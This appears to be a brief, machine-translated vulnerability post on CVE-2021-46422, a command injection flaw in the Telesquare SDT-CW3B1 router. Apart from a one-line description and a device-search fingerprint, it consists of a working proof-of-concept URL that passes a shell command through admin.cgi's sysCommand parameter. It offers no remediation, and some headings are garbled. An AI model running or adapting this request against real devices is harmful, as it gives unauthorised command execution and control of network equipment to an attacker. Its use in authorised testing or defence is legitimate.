Telesquare Sdt Cw3b1 Admin Cgi Remote Command Execution Vulnerability Cve 2021 46422
Telesquare Sdt Cw3b1 Admin Cgi Remote Command Execution Vulnerability Cve 2021 46422
Telesquare SDT-CW3B1 admin.cgi remote command execution vulnerability CVE-2021-46422
Vulnerability Description
Telesquare SDT-CW3B1 1.1.0 version has a command injection vulnerability, and an attacker can obtain server permissions through the vulnerability.
Vulnerability Impact
Telesquare SDT-CW3B1 1.1.0
Network surveying and mapping
app=”SDT-CS3B1”
Vulnerability reappears
Login page
Verify POC
1
/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id
This post is licensed under CC BY 4.0 by the author.